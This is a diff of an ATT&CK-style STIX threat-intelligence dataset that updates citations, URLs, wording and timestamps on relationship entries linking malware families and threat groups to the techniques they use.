+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "source_name": "McAfee Shamoon December19 2018",
+ "description": "Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 19). Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems. Retrieved May 29, 2020.",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/"
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.361Z",
+ "modified": "2020-06-15T14:22:34.198Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -101209,13 +102386,13 @@
"description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) encrypts the data with 3DES before sending it over the C2 server.(Citation: Talos Agent Tesla Oct 2018)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can encrypt data with 3DES before sending it over to a C2 server.(Citation: Talos Agent Tesla Oct 2018)",
"id": "relationship--c48ff628-9276-492f-a61c-73989785b292",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
"type": "relationship",
- "modified": "2020-03-30T02:48:51.810Z",
+ "modified": "2020-05-28T23:41:03.883Z",
"created": "2019-01-29T18:44:05.137Z"
},
{
@@ -101422,15 +102599,20 @@
"description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
"source_name": "TrendMicro Tropic Trooper Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted configuration files.(Citation: TrendMicro Tropic Trooper Mar 2018)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted configuration files.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--86333028-9eb1-44a3-9a5a-51fffe66f0e1",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.260Z",
+ "modified": "2020-05-21T12:59:00.609Z",
"created": "2019-01-29T20:17:49.354Z"
},
{
@@ -101468,12 +102650,12 @@
"url": "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
}
],
- "source_ref": "malware--2f1a9fd0-3b7c-4d77-a358-78db13adbe78",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--2f1a9fd0-3b7c-4d77-a358-78db13adbe78",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -102134,9 +103316,9 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -102148,7 +103330,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.760Z",
+ "modified": "2020-06-02T16:14:00.632Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -102288,16 +103470,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.646Z",
+ "modified": "2020-04-21T23:09:31.593Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -102462,7 +103644,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -102470,7 +103652,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
"type": "relationship",
- "modified": "2020-03-28T21:38:16.520Z",
+ "modified": "2020-06-22T17:54:16.030Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -102547,9 +103729,8 @@
"target_ref": "malware--b42378e0-f147-496f-992a-26a49705395b",
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
},
{
"url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf",
@@ -102557,14 +103738,14 @@
"source_name": "DustySky2"
},
{
- "url": "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html",
+ "source_name": "FireEye Operation Molerats",
"description": "Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016.",
- "source_name": "FireEye Operation Molerats"
+ "url": "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html"
}
],
"description": "(Citation: DustySky)(Citation: DustySky2)(Citation: FireEye Operation Molerats)",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.156Z",
+ "modified": "2020-05-14T14:30:09.800Z",
"created": "2017-05-31T21:33:27.056Z"
},
{
@@ -102664,16 +103845,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.726Z",
+ "modified": "2020-04-21T23:09:31.579Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -102795,12 +103976,12 @@
"url": "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf"
}
],
- "source_ref": "malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--ae9befd5-d8b7-4492-9b47-422a40d610cc",
@@ -102921,16 +104102,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.066Z",
+ "modified": "2020-05-12T22:13:17.027Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -103023,27 +104204,6 @@
"modified": "2020-03-19T22:02:49.077Z",
"created": "2017-12-14T16:46:06.044Z"
},
- {
- "id": "relationship--9ffda909-3503-47d8-9403-849a66eb9245",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "relationship_type": "uses",
- "target_ref": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5",
- "external_references": [
- {
- "source_name": "Check Point Rocket Kitten",
- "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
- "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
- }
- ],
- "description": "(Citation: Check Point Rocket Kitten)",
- "type": "relationship",
- "modified": "2020-03-18T13:34:21.375Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--f9600732-9116-4325-8073-28d81721b37a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -103142,16 +104302,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.074Z",
+ "modified": "2020-05-12T22:13:16.854Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -103314,16 +104474,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.151Z",
+ "modified": "2020-05-12T22:13:17.041Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -103369,18 +104529,23 @@
"source_name": "Fortinet Agent Tesla April 2018"
},
{
- "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.",
+ "source_name": "Fortinet Agent Tesla June 2017",
"url": "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html",
- "source_name": "Fortinet Agent Tesla June 2017"
+ "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can capture screenshots of the victim\u2019s desktop.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can capture screenshots of the victim\u2019s desktop.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)",
"id": "relationship--08109d9e-3258-4b9b-8e1d-ea90d05c18b9",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.289Z",
+ "modified": "2020-05-20T13:38:07.325Z",
"created": "2019-01-29T18:44:04.958Z"
},
{
@@ -103833,9 +104998,9 @@
"id": "relationship--0ef0077e-ee87-4e67-a466-2085a9148fc9",
"source_ref": "intrusion-set--d0b3393b-3bec-4ba3-bda9-199d30db47b6",
"relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"type": "relationship",
- "modified": "2020-03-19T17:56:14.650Z",
+ "modified": "2020-06-23T19:52:35.801Z",
"created": "2019-01-31T02:01:45.707Z"
},
{
@@ -104056,12 +105221,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb491007.aspx"
}
],
- "source_ref": "tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--c4d77981-d2e4-4a12-8e52-5b7464cdc8fd",
@@ -104192,12 +105357,12 @@
"url": "https://en.wikipedia.org/wiki/File_Transfer_Protocol"
}
],
- "source_ref": "tool--cf23bf4a-e003-4116-bbae-1ea6c558d565",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--cf23bf4a-e003-4116-bbae-1ea6c558d565",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--12904c83-67ad-430f-96ae-20e9081c2b5d",
@@ -104234,12 +105399,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--7af9715f-b85c-4fc5-8ef8-5884c8144178",
@@ -104932,13 +106097,13 @@
"description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) adds itself to the Registry as a startup program to establish persistence.(Citation: Fortinet Agent Tesla April 2018)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can add itself to the Registry as a startup program to establish persistence.(Citation: Fortinet Agent Tesla April 2018)",
"id": "relationship--0ecaa94b-3ad8-4de5-9cf2-81069676cfa3",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2019-04-16T14:30:35.394Z",
+ "modified": "2020-05-28T23:41:03.880Z",
"created": "2019-01-29T18:44:04.954Z"
},
{
@@ -105112,7 +106277,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -105121,7 +106286,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.291Z",
+ "modified": "2020-04-16T19:41:40.642Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -105641,12 +106806,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb490968.aspx"
}
],
- "source_ref": "tool--b77b563c-34bb-4fb8-86a3-3694338f7b47",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--b77b563c-34bb-4fb8-86a3-3694338f7b47",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735"
},
{
"id": "relationship--c2e58b40-7644-4c0c-92ac-b63a565aca44",
@@ -105699,16 +106864,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.155Z",
+ "modified": "2020-05-12T22:13:17.044Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -105931,7 +107096,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
"type": "relationship",
- "modified": "2020-02-12T20:27:07.904Z",
+ "modified": "2020-03-31T22:14:56.184Z",
"created": "2017-05-31T21:33:27.026Z"
},
{
@@ -106171,9 +107336,9 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -106185,7 +107350,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.802Z",
+ "modified": "2020-06-02T16:14:00.911Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -106275,7 +107440,7 @@
{
"id": "relationship--52781f1e-4b91-4ff2-8f48-89e15bc40d42",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWRUNER](https://attack.mitre.org/software/S0184) may collect information the victim's anti-virus software.(Citation: FireEye APT34 Dec 2017)",
+ "description": "[POWRUNER](https://attack.mitre.org/software/S0184) may collect information on the victim's anti-virus software.(Citation: FireEye APT34 Dec 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -106290,28 +107455,33 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2020-03-17T02:14:56.003Z",
+ "modified": "2020-07-06T16:11:56.829Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
"id": "relationship--b258b8da-ddd2-4f0e-b5da-83a89f018d54",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) runs its core DLL file using rundll32.exe.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) runs its core DLL file using rundll32.exe.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.138Z",
+ "modified": "2020-06-16T20:51:14.126Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -106328,12 +107498,12 @@
"url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
}
],
- "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279"
},
{
"id": "relationship--3a31a022-8bb1-4102-9c9a-7289febdcc5c",
@@ -106401,22 +107571,27 @@
{
"id": "relationship--a83182d2-b619-4ca4-984b-21ecfe43da26",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.140Z",
+ "modified": "2020-06-16T20:51:14.106Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -106514,14 +107689,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
- "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "target_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.777Z",
+ "modified": "2020-06-29T01:54:53.451Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -106577,14 +107752,14 @@
{
"source_name": "Symantec Waterbug",
"description": "Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.",
